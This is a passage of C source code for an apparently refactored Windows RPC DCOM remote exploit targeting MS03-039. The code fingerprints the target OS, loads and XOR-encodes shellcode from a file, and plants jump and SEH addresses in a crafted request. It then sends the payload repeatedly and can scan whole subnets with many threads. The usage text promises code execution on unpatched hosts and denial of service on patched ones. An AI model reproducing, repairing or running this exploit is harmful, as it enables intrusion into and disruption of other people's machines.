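    addr_in.sin_port = htons(RPC_PORT);
    addr_in.sin_addr.S_un.S_addr = inet_addr(ip);

    /* --- 1. fingerprint ------------------------------------------------- */
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("Socket failed.Error:%d\n", WSAGetLastError());
        return 0;
    }
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                   NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        printf("%s - connect failed\n", ip);
        closesocket(sock);
        return 0;
    }
    /* version(): 1 = XP, 0 = 2K, -1 = unknown. Only an explicit 0 selects the
       Win2K entry; XP and "unknown" both fall on target_os[0], as before. */
    vers = (version(ip, (int)sock) == 0) ? 1 : 0;
    closesocket(sock);

    /* --- 2. shellcode --------------------------------------------------- */
    fp = fopen("bshell2", "rb");
    if (fp == NULL) {
        printf("%s - cannot open shellcode file bshell2\n", ip);
        return 0;
    }
    sz = fread(shellcode, 1, sizeof(shellcode), fp);
    fclose(fp);
    if (sz > sizeof(rawData) - SHELLCODE_OFF) {
        /* the original copied up to 1024 bytes into a 1036-byte buffer at 0x71 */
        printf("%s - shellcode too large (%u bytes, max %u)\n", ip,
               (unsigned)sz, (unsigned)(sizeof(rawData) - SHELLCODE_OFF));
        return 0;
    }

    copy = sizeof(rawData1) < sizeof(rawData) ? sizeof(rawData1) : siz
eof(rawData);
    memset(rawData, 0, sizeof rawData);
    memcpy(rawData, rawData1, copy);
    memcpy(rawData + SHELLCODE_OFF, shellcode, sz);
    put32(rawData + SHELLCODE_OFF + HEAP_OFF, target_os[vers].heap);
    XOR(rawData, SHELLCODE_OFF, (int)sz, 0x99);   /* heap slot is encoded too */

    /* --- 3. fixed slots ------------------------------------------------- */
    put32(rawData + JMP_OFF, target_os[vers].jmp);
    put32(rawData + SEH_OFF, target_os[vers].seh);
    put16(rawData + SIZE_OFF, (WORD)sz);

    /* --- 4. assemble ---------------------------------------------------- */
    memcpy(req2, request2, sizeof req2);
    add32(req2, sizeof(rawData) / 2);        /* counts are in UTF-16 units */
    add32(req2 + 8, sizeof(rawData) / 2);

    pos = 0;
    memcpy(buf2 + pos, request1, sizeof request1); pos += sizeof request1;
    memcpy(buf2 + pos, req2,     sizeof req2);     pos += sizeof req2;
    memcpy(buf2 + pos, rawData,  sizeof rawData);  pos += sizeof rawData;
    memcpy(buf2 + pos, request3, sizeof request3); pos += sizeof request3;
    memcpy(buf2 + pos, request4, sizeof request4); pos += sizeof request4;
    for (size_t i = 0; i < sizeof(len_fixups) / sizeof(len_fixups[0]); i++)
        add32(buf2 + len_fixups[i], (DWORD)(sizeof(rawData) - 0xc));

    if (!atack) {
        log_target(target_os[vers].target, ip);
        return 1;
    }

    /* --- 5. deliver ----------------------------------------------------- */
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("Socket failed.Error:%d\n", WSAGetLastError());
        return 0;
    }
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                   NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        printf("%s - connect failed\n", ip);
        closesocket(sock);
        return 0;
    }
    if (send(sock, (const char *)bindstr, sizeof(bindstr), 0) == SOCKET_ERROR) {
        printf("%s - send failed %d\n", ip, WSAGetLastError());
        closesocket(sock);
        return 0;
    }
    printf("%s - send exploit to %s\n", ip, target_os[vers].target);
    (void)recv(sock, (char *)buf1, sizeof buf1, 0);   /* bind_ack, not inspected */

    /* Resend until the peer refuses. The original had no other exit from this
       loop either; the socket is now closed when it ends. */
    for (int i = 0;;) {
        if (send(sock, (const char *)buf2, (int)pos, 0) == SOCKET_ERROR) {
            printf("\nSend failed.Error:%d\n", WSAGetLastError());
            break;
        }
        printf("\r%d", ++i);
    }
    closesocket(sock);
    return 1;
}

/* Number of scan threads in flight; updated with Interlocked* (was a plain ++/--). */
volatile LONG thread_count = 0;

/* Scratch buffer main() formats each scan address into before copying it. */
char adr[200];

/*
 * Scan-mode worker. lpParameter is a malloc'd address string owned by this
 * thread and freed here. Runs attack() in scan (non-attack) mode and releases
 * the slot main() reserved in thread_count before creating the thread.
 */
DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
    char *target = (char *)lpParameter;

    if (target != NULL) {
        attack(target, false);
        free(target);
    }
    InterlockedDecrement(&thread_count);
    return 0;
}

/* Print the command-line help to stderr. */
static void usage(const char *prog)
{
    fprintf(stderr,
            "RPC universal exploit. Exploits the MS03-039 vulnerability\n"
            "unpatched host - code execution\n"
            "patched host - DoS\n"
            "based on original XFocus RPCDCOM2 exploit\n"
            "modification and shellcode (c) by karlss0n\n"
            "downloaded on www.k-otik.com\n"
            "\n"
            "usage: %s <target_ip>\n"
            "       %s <a> <b> <c_start> <d_start> <max_threads>   (scan a.b.c.d, log OS per host)\n",
            prog, prog);
}

/*
 * Entry point.
 *   <target_ip>                                   attack one host, wait 20 s, exit 2
 *   <a> <b> <c_start> <d_start> <max_threads>     scan a.b.c.d for c,d in [start,254],
 *                                                 fingerprint only, exit 0
 * Exit codes: 1 when WinSock cannot be initialised, 10 on bad arguments.
 */
int main(int argc, char **argv)
{
    WSADATA wsaData;

    if (argc != 2 && argc != 6) {
        usage(argv[0]);
        return 10;
    }
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        fprintf(stderr, "WSAStartup failed: no usable WinSock DLL\n");
        return 1;
    }

    if (argc == 2) {
        /* Single-target mode needs a dotted address; the original fell into
           scan mode here and read argv[3..5] past the end of argv. */
        if (strchr(argv[1], '.') == NULL) {
            usage(argv[0]);
            WSACleanup();
            return 10;
        }
        attack(argv[1], true);
        Sleep(20000);
        WSACleanup();
        return 2;
    }

    /* Scan mode. */
    int cb = atoi(argv[3]);
    int db = atoi(argv[4]);
    long tm = atol(argv[5]);
    if (cb < 1 || cb > 254 || db < 1 || db > 254 || tm < 1) {
        fprintf(stderr, "c_start/d_start must be 1..254 and max_threads >= 1\n");
        WSACleanup();
        return 10;
    }

    /* Note: as in the original, the d loop restarts at d_start for every c. */
    for (int c = cb; c < 255; c++) {
        for (int d = db; d < 255; d++) {
            snprintf(adr, sizeof adr, "%s.%s.%d.%d", argv[1], argv[2], c, d);
            while (thread_count > tm)
                Sleep(100);

            size_t n = strlen(adr) + 1;
            char *target = malloc(n);
            if (target == NULL)
                continue;
            memcpy(target, adr, n);

            InterlockedIncrement(&thread_count);   /* reserve before the thread runs */
            HANDLE h = CreateThread(NULL, 0, ThreadProc, target, 0, NULL);
            if (h == NULL) {
                InterlockedDecrement(&thread_count);
                free(target);
                continue;
            }
            CloseHandle(h);   /* the original leaked every thread handle */
            Sleep(10);
        }
    }

    Sleep(60000);   /* let in-flight probes finish, as the original did */
    if (fp1 != NULL)
        fclose(fp1);
    WSACleanup();
    return 0;
}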